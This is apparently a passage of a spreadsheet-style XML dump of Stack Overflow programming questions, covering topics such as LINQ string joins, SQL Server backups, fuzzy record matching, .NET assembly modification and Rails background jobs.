    <t xml:space="preserve">&lt;p&gt;I'm not asking about general syntactic rules for file names. I mean gotchas that jump out of nowhere and bite you. For example, trying to name a file "COM&amp;lt;n&amp;gt;" on Windows?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the LINQ way to implode/join a string array?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following string array:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var sa = new string[] {"yabba","dabba","doo"};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I can convert it to "yabba, dabba, doo" it using string.Join() but what is the super-cool LINQ way of doing it?  The Join extension method seems promising but for a novice like me very confusing.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is a simple command line program or script to backup SQL server databases?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been too lax with performing DB backups on our internal servers. &lt;/p&gt;
&lt;p&gt;Is there a simple command line program that I can use to backup certain databases in SQL Server 2005? Or is there a simple VBScript? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to line up items of varied length in a resizable space in CSS?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to line up items approximately like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;item1      item2           i3           longitemname
i4         longitemname2   anotheritem  i5
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Basically items of varying length arranged in a table like structure. The tricky part is the container for these can vary in size and I'd like to fit as many as I can in each row - in other words, I won't know beforehand how many items fit in a line, and if the page is resized the items should re-flow themselves to accommodate. E.g. initially 10 items could fit on each line, but on resize it could be reduced to 5.&lt;/p&gt;
&lt;p&gt;I don't think I can use an html table since I don't know the number of columns (since I don't know how many will fit on a line). I can use css to float them, but since they're of varying size they won't line up.&lt;/p&gt;
&lt;p&gt;So far the only thing I can think of is to use javascript to get the size of largest item, set the size of all items to that size, and float everything left.&lt;/p&gt;
&lt;p&gt;Any better suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>how to determine if a record in every source, represents the same person</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have several sources of tables with personal data, like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SOURCE 1
ID, FIRST_NAME, LAST_NAME, FIELD1, ...
1, jhon, gates ...
SOURCE 2
ID, FIRST_NAME, LAST_NAME, ANOTHER_FIELD1, ...
1, jon, gate ...
SOURCE 3
ID, FIRST_NAME, LAST_NAME, ANOTHER_FIELD1, ...
2, jhon, ballmer ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, assuming that records with ID 1, from sources 1 and 2, are the same person, my problem &lt;strong&gt;is how to determine if a record in every source, represents the same person&lt;/strong&gt;. Additionally, sure not every records exists in all sources. All the names, are written in spanish, mainly.&lt;/p&gt;
&lt;p&gt;In this case, the exact matching needs to be relaxed because we assume &lt;em&gt;the data sources has not been rigurously checked&lt;/em&gt; against the official bureau of identification of the country. Also we need to assume &lt;em&gt;typos are common&lt;/em&gt;, because the nature of the processes to collect the data. What is more, the amount of records is around 2 or 3 millions in every source...&lt;/p&gt;
&lt;p&gt;Our team had thought in something like this: first, force exact matching in selected fields like ID NUMBER, and NAMES to know how hard the problem can be. Second, relaxing the matching criteria, and count how much records more can be matched, but is here where the problem arises: &lt;strong&gt;how to do to relax the matching criteria without generating too noise neither restricting too much?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;What tool can be more effective to handle this?, for example, do you know about some especific extension in some database engine to support this matching?
Do you know about clever algorithms like &lt;a href="http://en.wikipedia.org/wiki/Soundex" rel="nofollow"&gt;soundex&lt;/a&gt; to handle this approximate matching, but for spanish texts?&lt;/p&gt;
&lt;p&gt;Any help would be appreciated!&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>opening links in the same window or in a new (tab)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It has always been best practice to open links in the same window. Should that still be the rule now that most common browsers use tabs? Personally i prefer closing a tab/window over hitting the backbutton. What are your thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Naming a "core" Assembly</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know that this is somewhat subjective, but I wonder if there is a generally accepted standard for naming assemblies which contain some "core" functions.&lt;/p&gt;
&lt;p&gt;Let's say you got a larger Projects, with Assemblies like&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Company.Product.WebControls.dll&lt;/li&gt;
&lt;li&gt;Company.Product.Net.dll&lt;/li&gt;
&lt;li&gt;Company.Product.UserPages.dll&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;and you have a Bunch of "Core" classes, like the Global Error Handler, the global Logging functionality etc.&lt;/p&gt;
&lt;p&gt;How would such an assembly generally named? Here are some things I had in mind:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Company.Product.dll&lt;/li&gt;
&lt;li&gt;Company.Product.Core.dll&lt;/li&gt;
&lt;li&gt;Company.Product.Global.dll&lt;/li&gt;
&lt;li&gt;Company.Product.Administration.dll&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Now, while "just pick one and go on" will not cause Armageddon, I'd still like to know if there is an "accepted" way to name those assemblies.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Code analysis</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know where to find an explanation to the warnings in vs 2005 codeanalysis tool. I would like some documentation, explainning why it creates the warnings it does and what course of action one should take.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Installing TFS 2008 Workgroup Edition on Windows Server 2003 with SQL Server 2008</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I ran into an issue when installing Team Foundation Server 2008 Workgroup Edition. I have a Windows Server 2003 SP2 machine that's practically new. I have installed SQL Server 2008 with almost all of the options. When I run through the TFS installation, it allows me to enter my SQL instance name and then goes through the verification process to ensure I have everything I need. However, I receive an error stating that &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;A compatible version of SQL Server is not installed. &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I verified and I do have SQL Server 2008 running just fine. It's Standard edition and does have Full Text, Reporting, and Analysis services installed. The other errors I receive are with Full Text not being installed, running, or enabled.&lt;/p&gt;
&lt;p&gt;Any help is appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Zabbix: is it possible to monitor arbitrary string variable?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are using Zabbix for services monitoring.&lt;/p&gt;
&lt;p&gt;There are some essential monitoring configured.
I want to have timeline of version strings of my service along with this monitorings. That would give me opportunity to see that upgrading to this version altered overall error-count.&lt;/p&gt;
&lt;p&gt;Is it possible? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Modifying Existing .NET Assemblies</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to modify existing .NET assemblies without resorting to 3rd party tools? I know that &lt;a href="http://www.postsharp.org/"&gt;PostSharp&lt;/a&gt; makes this possible but I find it incredibly wasteful that the developler of PostSharp basically had to rewrite the functionality of the whole &lt;code&gt;System.Reflection&lt;/code&gt; namespace in order to make existing assemblies modifiable.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;System.Reflection.Emit&lt;/code&gt; only allows the creation of new, dynamic assemblies. However, all the builder classes used here inherit from the basic reflection classes (e.g. &lt;code&gt;TypeBuilder&lt;/code&gt; inherits from &lt;code&gt;System.Type&lt;/code&gt;). Unfortunately, there doesn't seem to be a way to coerce an existing, dynamically loaded type into a type builder. At least, there's no official, supported way.&lt;/p&gt;
&lt;p&gt;So what about unsupported? Does anyone know of backdoors that allow to load existing assemblies or types into such builder classes?&lt;/p&gt;
&lt;p&gt;Mind, I am &lt;strong&gt;not&lt;/strong&gt; searching for ways to modify the current assembly (this &lt;em&gt;may&lt;/em&gt; even be an unreasonable request) but just to modify existing assemblies loaded from disc. I fear there's no such thing but I'd like to ask anyway.&lt;/p&gt;
&lt;p&gt;In the worst case, one would have to resort to &lt;code&gt;ildasm.exe&lt;/code&gt; to disassemble the code and then to &lt;code&gt;ilasm.exe&lt;/code&gt; for reassembly but there's no toolchain (read: IL reader) contained in .NET to work with IL data (or is there?).&lt;/p&gt;
&lt;p&gt;/EDIT:&lt;/p&gt;
&lt;p&gt;I've got no specific use case. I'm just interested in a general-purpose solution because patching existing assemblies is a quite common task. Take obfuscators for example, or profilers, or AOP libraries (yes, the latter &lt;em&gt;can&lt;/em&gt; be implemented differently). As I've said, it seems incredibly wasteful to be forced to rewrite large parts of the already existing infrastructure in &lt;code&gt;System.Reflection&lt;/code&gt;.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;@Wedge:&lt;/h2&gt;
&lt;p&gt;You're right. However, there's no specific use case here. I've modified the original question to reflect this. My interest was sparked by another question where the asker wanted to know how he could inject the instructions &lt;code&gt;pop&lt;/code&gt; and &lt;code&gt;ret&lt;/code&gt; at the end of every method in order to keep Lutz Roeder's Reflector from reengineering the (VB or C#) source code.&lt;/p&gt;
&lt;p&gt;Now, this scenario can be realized with a number of tools, e.g. PostSharp mentioned above and the &lt;a href="http://sebastien.lebreton.free.fr/reflexil/"&gt;Reflexil&lt;/a&gt; plugin for Reflector, that, in turn, uses the &lt;a href="http://www.mono-project.com/Cecil"&gt;Cecil&lt;/a&gt; library.&lt;/p&gt;
&lt;p&gt;All in all, I'm just not satisfied with the .NET framework.&lt;/p&gt;
&lt;h2&gt;@Joel:&lt;/h2&gt;
&lt;p&gt;Yes, I'm aware of this limitation. Thanks anyway for pointing it out, since it's important.&lt;/p&gt;
&lt;h2&gt;@marxidad:&lt;/h2&gt;
&lt;p&gt;This seems like the only feasible approach. However, this would mean that you'd still have to recreate the complete assembly using the builder classes, right? I.e. you'd have to walk over the whole assembly manually.&lt;/p&gt;
&lt;p&gt;Hmm, I'll look into that.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What CLR/.NET bytecode tools exist?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm well aware of Java tools for manipulating, generating, decompiling JVM bytecode (ASM, cglib, jad, etc).  What similar tools exist for the CLR bytecode?  Do people do bytecode manipulation for the CLR?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ways to do "related searches" functionality</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've seen a few sites that list related searches when you perform a search, namely they suggest other search queries you may be interested in.&lt;/p&gt;
&lt;p&gt;I'm wondering the best way to model this in a medium-sized site (not enough traffic to rely on visitor stats to infer relationships). My initial thought is to store the top 10 results for each unique query, then when a new search is performed to find all the historical searches that match some amount of the top 10 results but ideally not matching all of them (matching all of them might suggest an equivalent search and hence not that useful as a suggestion).&lt;/p&gt;
&lt;p&gt;I imagine that some people have done this functionality before and may be able to provide some ideas of different ways to do this. I'm not necessarily looking for one winning idea since the solution will no doubt vary substantially depending on the size and nature of the site.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Automatic newlines and formatting for blogging software</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing by own blogging engine in PHP with a MYSQL backend database. MY question is: How would you go about making user comments and blog posts include newlines wherever they are appropriate?&lt;/p&gt;
&lt;p&gt;For example, if a user hits the return key in the message/comments box how would this translate into a new line that would show in the browser when the comment is viewed?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is MEF a replacement for System.Addin?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Possible Duplicate:&lt;/strong&gt;&lt;br&gt;
  &lt;a href="http://stackoverflow.com/questions/835182/choosing-between-mef-and-maf-system-addin"&gt;Choosing between MEF and MAF (System.AddIn)&lt;/a&gt;  &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Is the Managed Extensibility Framework a replacement for System.Addin? Or are they complementary?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>A Delphi/FreePascal lib or function that emulates the PHP's function parse_url</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm doing a sitemap producer in Object Pascal and need a good function or lib to emulate the &lt;a href="http://php.net/manual/en/function.parse-url.php" rel="nofollow"&gt;parse_url&lt;/a&gt; function on PHP.&lt;/p&gt;
&lt;p&gt;Does anyone know of any good ones?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best Practices of Test Driven Development Using C# and RhinoMocks</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In order to help my team write testable code, I came up with this simple list of best practices for making our C# code base more testable. (Some of the points refer to limitations of Rhino Mocks, a mocking framework for C#, but the rules may apply more generally as well.)  Does anyone have any best practices that they follow?&lt;/p&gt;
&lt;p&gt;To maximize the testability of code, follow these rules:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Write the test first, then the code.&lt;/strong&gt; Reason: This ensures that you write testable code and that every line of code gets tests written for it.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Design classes using dependency injection.&lt;/strong&gt; Reason: You cannot mock or test what cannot be seen.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Separate UI code from its behavior using Model-View-Controller or Model-View-Presenter.&lt;/strong&gt; Reason: Allows the business logic to be tested while the parts that can't be tested (the UI) is minimized.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Do not write static methods or classes.&lt;/strong&gt;  Reason: Static methods are difficult or impossible to isolate and Rhino Mocks is unable to mock them.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Program off interfaces, not classes.&lt;/strong&gt; Reason: Using interfaces clarifies the relationships between objects. An interface should define a service that an object needs from its environment.  Also, interfaces can be easily mocked using Rhino Mocks and other mocking frameworks.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Isolate external dependencies.&lt;/strong&gt; Reason: Unresolved external dependencies cannot be tested.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Mark as virtual the methods you intend to mock.&lt;/strong&gt; Reason: Rhino Mocks is unable to mock non-virtual methods.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>Mysql results in PHP - arrays or objects?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Been using &lt;strong&gt;PHP/MySQL&lt;/strong&gt; for a little while now, and I'm wondering if there are any specific advantages (performance or otherwise) to using &lt;code&gt;mysql_fetch_object()&lt;/code&gt; vs &lt;code&gt;mysql_fetch_assoc()&lt;/code&gt; / &lt;code&gt;mysql_fetch_array()&lt;/code&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to do a rolling restart of a cluster of mongrels</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Anybody know a nice way to restart a mongrel cluster via capistrano in a "rolling" style, eg, one mongrel at a time. Would be great to have a bit of wait time in there as well for each, to let the mongrel load the rails app up as well. &lt;/p&gt;
&lt;p&gt;I've done some searching, and haven't found too much, so looking for help before I dive into the mongrel_cluster gem myself.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there any way to use XmlSiteMapProvider within WinForm/Console/VSTest application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wonder whether there is a workaround for using the standard XmlSiteMapProvider within a non asp.net application, like WinForm/Console or, in my case, VS Unit Test one.&lt;/p&gt;
&lt;p&gt;The following code fails, because it cannot create a path to the &lt;code&gt;.sitemap&lt;/code&gt; file inside a private &lt;code&gt;GetConfigDocument&lt;/code&gt; method.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;XmlSiteMapProvider provider = new XmlSiteMapProvider();
NameValueCollection providerAttributes = new NameValueCollection();
providerAttributes.Add("siteMapFile", "Web.sitemap");
provider.Initialize("XmlSiteMapReader", providerAttributes);
provider.BuildSiteMap();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I feel the right solution is to write another provider.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to run asynchronous jobs in a Rails application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know there are several plugins that do asynchronous processing.  Which one is the best one and why?&lt;/p&gt;
&lt;p&gt;The ones I know about are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://backgroundrb.rubyforge.org/"&gt;BackgrounDRb&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>WPF Diagramming Library</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What free or open source WPF diagramming libraries have you used before? I'm working on my thesis and have no money to pay for the commercial alternatives.&lt;/p&gt;
&lt;p&gt;Valid answers should support undo/redo, exporting to XML and hopefully good documentation.&lt;/p&gt;
&lt;p&gt;I'm building an open source UML / database diagramming tool.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Turn an array of pixels into an Image object with Java's ImageIO?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently turning an array of pixel values (originally created with a java.awt.image.PixelGrabber object) into an Image object using the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public Image getImageFromArray(int[] pixels, int width, int height) {
    MemoryImageSource mis = new MemoryImageSource(width, height, pixels, 0, width);
    Toolkit tk = Toolkit.getDefaultToolkit();
    return tk.createImage(mis);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;em&gt;Is it possible to achieve the same result using classes from the ImageIO package(s) so I don't have to use the AWT Toolkit?&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Toolkit.getDefaultToolkit() does not seem to be 100% reliable and will sometimes throw an AWTError, whereas the ImageIO classes should always be available, which is why I'm interested in changing my method.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Have you integrated Mantis and Subversion?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I do mostly Windows development.  We use &lt;a href="http://www.mantisbt.org/"&gt;Mantis&lt;/a&gt; and &lt;a href="http://subversion.tigris.org/"&gt;Subversion&lt;/a&gt; for our development but they aren't integrated together, in fact they are on different servers.&lt;/p&gt;
&lt;p&gt;I did a little googling about integrating the two together and came across &lt;a href="http://alt-tag.com/blog/archives/2006/11/integrating-mantis-and-subversion/"&gt;this post&lt;/a&gt;.  It looked interesting.&lt;/p&gt;
&lt;p&gt;I was wondering if anyone is doing this or has done this and what your experience has been.  If you've got a different solution, I'd be interested in knowing that too!&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What do you use to deploy your Web Applications?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We're looking to automate our deployment of Web Applications, particularly when going from local development to a remote server.&lt;/p&gt;
&lt;p&gt;Our current stack is LAMP remotely, MAMP locally, but I'm interested in general what people are using for this task regardless of their environment?&lt;/p&gt;
&lt;p&gt;I'm not just talking about moving files around, I also meant considering other tasks such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Setting up Database schema&lt;/li&gt;
&lt;li&gt;Managing configurations&lt;/li&gt;
&lt;li&gt;Misc tasks required for deployment (creating log files etc.)&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Is it possible to prevent stack allocation of an object and only allow it to be instantiated with 'new'?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to prevent stack allocation of an object and only allow it to be instiated with 'new' on the heap?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the difference between Polymorphism and Multiple Dispatch?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;...or are they the same thing? I notice that each has its own Wikipedia entry: &lt;a href="http://en.wikipedia.org/wiki/Polymorphism_(computer_science)"&gt;[1]&lt;/a&gt; &lt;a href="http://en.wikipedia.org/wiki/Multiple_dispatch"&gt;[2]&lt;/a&gt;, but I'm having trouble seeing how the concepts differ.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; And how does &lt;a href="http://en.wikipedia.org/wiki/Overloaded"&gt;Overloading&lt;/a&gt; fit into all this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Free/Open Source Test Generator for Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any libraries for Java that can generate unit tests or unit test skeletons for existing code? I'm looking for something similar to &lt;a href="http://pythoscope.org/"&gt;pythoscope&lt;/a&gt;. Ideally it would generate code that follows JUnit4 or TestNG conventions.&lt;/p&gt;
&lt;p&gt;It looks like &lt;a href="http://www.agitar.com/"&gt;Agitar&lt;/a&gt; does something like this, but I'm looking for something free.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any quirks I should be aware of in Drupal's XML-RPC and BlogAPI implementations?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm beginning work on a project that will access a &lt;code&gt;Drupal&lt;/code&gt; site to create (and eventually edit) nodes on the site, via the &lt;code&gt;XML-RPC&lt;/code&gt; facility and &lt;code&gt;BlogAPI&lt;/code&gt; module shipped with &lt;code&gt;Drupal&lt;/code&gt;. This includes file uploading, as the project is to allow people to upload pictures en mass to a &lt;code&gt;Drupal&lt;/code&gt; site with minimal ado.&lt;/p&gt;
&lt;p&gt;What I'd like to know is if there are any caveats I should look out for. Has anyone had experience targeting &lt;code&gt;Drupal's XML-RPC implementation&lt;/code&gt;, or the implementation of any of the &lt;code&gt;blogging APIs&lt;/code&gt; supported by its &lt;code&gt;BlogAPI module&lt;/code&gt;? What advice would you give to others taking the same path?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MySQL search and replace some text in a field</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What MySQL query will do a text search and replace in one particular field in a table?&lt;/p&gt;
&lt;p&gt;ie search for 'foo' and replace with 'bar' so a record with a field with the value : 'hello foo' becomes: 'hello bar'.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Generic LINQ query predicate?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Not sure if this is possible or if I'm expressing correctly what I'm looking for, but I have the following piece of code in my library repeatedly and would like to practice some DRY. 
I have set of SQL Server tables that I'm querying based on a simple user-supplied search field ala Google. I'm using LINQ to compose the final query based on what's in the search string. I'm looking for a way to use generics and passed in lambda functions to create a reusable routine out of this: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string[] arrayOfQueryTerms = getsTheArray();
var somequery = from q in dataContext.MyTable
                select q;
if (arrayOfQueryTerms.Length == 1)
{
    somequery = somequery.Where&amp;lt;MyTableEntity&amp;gt;(
        e =&amp;gt; e.FieldName.StartsWith(arrayOfQueryTerms[0]));
}
else
{
    foreach(string queryTerm in arrayOfQueryTerms)
    {
        if (!String.IsNullOrEmpty(queryTerm))
        {
            somequery = somequery 
                        .Where&amp;lt;MyTableEntity&amp;gt;(
                            e =&amp;gt; e.FieldName.Contains(queryTerm));
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I was hoping to create a generic method with signature that looks something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private IQueryable&amp;lt;T&amp;gt; getQuery(
    T MyTableEntity, string[] arrayOfQueryTerms, Func&amp;lt;T, bool&amp;gt; predicate)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm using the same search strategy across all my tables, so the only thing that really differs from usage to usage is the MyTable &amp;amp; MyTableEntity searched and the FieldName searched. Does this make sense? Is there a way with LINQ to dynamically pass in the name of the field to query in the where clause? Or can I pass in this as a predicate lambda?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;e =&amp;gt; e.FieldName.Contains(queryTerm)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I realize there a million and a half ways to do this in SQL, probably easier, but I'd love to keep everything in the LINQ family for this one. Also, I feel that generics should be handy for a problem like this. Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Need to create a dynamic ConfigurationSection that also holds the type</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to create a configuration section, that is able to store key-value pairs in an app.config file and the key-value pairs can be added runtime regardless of their type. It is also important that the value keeps its original type. I need to extend the following interface &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public interface IPreferencesBackend
{
    bool TryGet&amp;lt;T&amp;gt;(string key, out T value);
    bool TrySet&amp;lt;T&amp;gt;(string key, T value); 
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;At runtime, I can say something like: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;My.Foo.Data data = new My.Foo.Data("blabla");
Pref pref = new Preferences();
pref.TrySet("foo.data", data); 
pref.Save();
My.Foo.Data date = new My.Foo.Data();
pref.TryGet("foo.data", out data);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I tried with System.Configuration.Configuration.AppSettings, but the problem with that that it is storing the key-value pairs in a string array. &lt;/p&gt;
&lt;p&gt;What I need is to have an implementation of System.Configuration.ConfigurationSection, where I can control the how the individual setting is serialized. I noticed that the settings generated by Visual Studio kind of do this. It is using reflection to create all the setting keys. what I need is to do this runtime and dynamically. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[System.Configuration.UserScopedSettingAttribute()]
[System.Diagnostics.DebuggerNonUserCodeAttribute()]
[System.Configuration.DefaultSettingValueAttribute("2008-09-24")]
public global::System.DateTime DateTime {
   get {
        return ((global::System.DateTime)(this["DateTime"]));
       }
   set {
        this["DateTime"] = value;
       }
 }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Deploy multiple instance of reporting services or connect to multiple versions of DLLs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any way in SSRS2008 to deploy multiple instances of the ReportServer running separate code sets?&lt;/p&gt;
&lt;p&gt;I'm developing a very specific deployment of reporting services where I have a number of custom extensions plugged in.  But, my company typically deploys multiple versions of a release at once on the same server.  I'm at a little bit of a loss of a good way to do this with reporting services.&lt;/p&gt;
&lt;p&gt;I know that I have a few alternatives:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Run multiple instances of Reporting Services with different code sets&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The downside to this is that it's a little bit of a headache to upgrade and I'd rather not have multiple instances of the reporting databases.  I'm not sure if they would play well together if they were targeting the same databases.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Invoke/include the version specific DLLs on demand by reading from an HTTPRequest variable. (Assembly.LoadFile)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I have a feeling that this could have performance issues and it also sounds like a potential debugging nightmare.  I have also not used Assembly.LoadFile before and I'm unsure of how much code I'd have to write that was unversioned to control the versioning system.&lt;/p&gt;
&lt;p&gt;Anyone out there have experience with any of this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Job Status</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am actually working on SP in SQL 2005. Using SP i am creating a job and am scheduling it for a particular time. These jobs take atleast 5 to 10 min to complete as the database is very huge. But I am not aware of how to check the status of the Job. I want to know if it has got completed successfully or was there any error in execution. On exception i also return proper error code. But i am not aware of where i can check for this error code.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the advantages of using the C++ Boost libraries?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So, I've been reading through and it appears that the Boost libraries get used a lot in practice (not at my shop, though). Why is this? and what makes it so wonderful? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I hyperlink to a file that is not in my Web Application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ok, my web application is at &lt;strong&gt;C:\inetpub\wwwroot\website&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The files I want to link to are in &lt;strong&gt;S:\someFolder&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Can I make a link in the webapp that will direct to the file in &lt;strong&gt;someFolder&lt;/strong&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Piece together several images into one big image</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to put several images together into one big image, and am looking for an algorithm which determines the placing most optimally. The images can't be rotated or resized, but the position in the resulting image is not important.&lt;/p&gt;
&lt;p&gt;edit: added no resize constraint&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I programatically manipulate any Windows application's common dialog box?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My ultimate goal here is to write a utility that lets me quickly set the folder on &lt;em&gt;any&lt;/em&gt; dialog box, choosing from a preset list of 'favorites'. As I'm just a hobbyist, not a pro, I'd prefer to use .NET as that's what I know best. I do realize that some of this stuff might require something more than what I could do in C#.&lt;/p&gt;
&lt;p&gt;I have seen some applications that are able to extend the common dialog box (specifically for Save As.. and File Open) either by adding buttons to the toolbar (eg: &lt;a href="http://www.win-utilities.com/dba/index.html" rel="nofollow"&gt;Dialog Box Assistant&lt;/a&gt;) or by putting extra buttons in the title bar beside the minimize, maximize, and/or close buttons. Either would be good option though I don't have the foggiest idea where to begin.&lt;/p&gt;
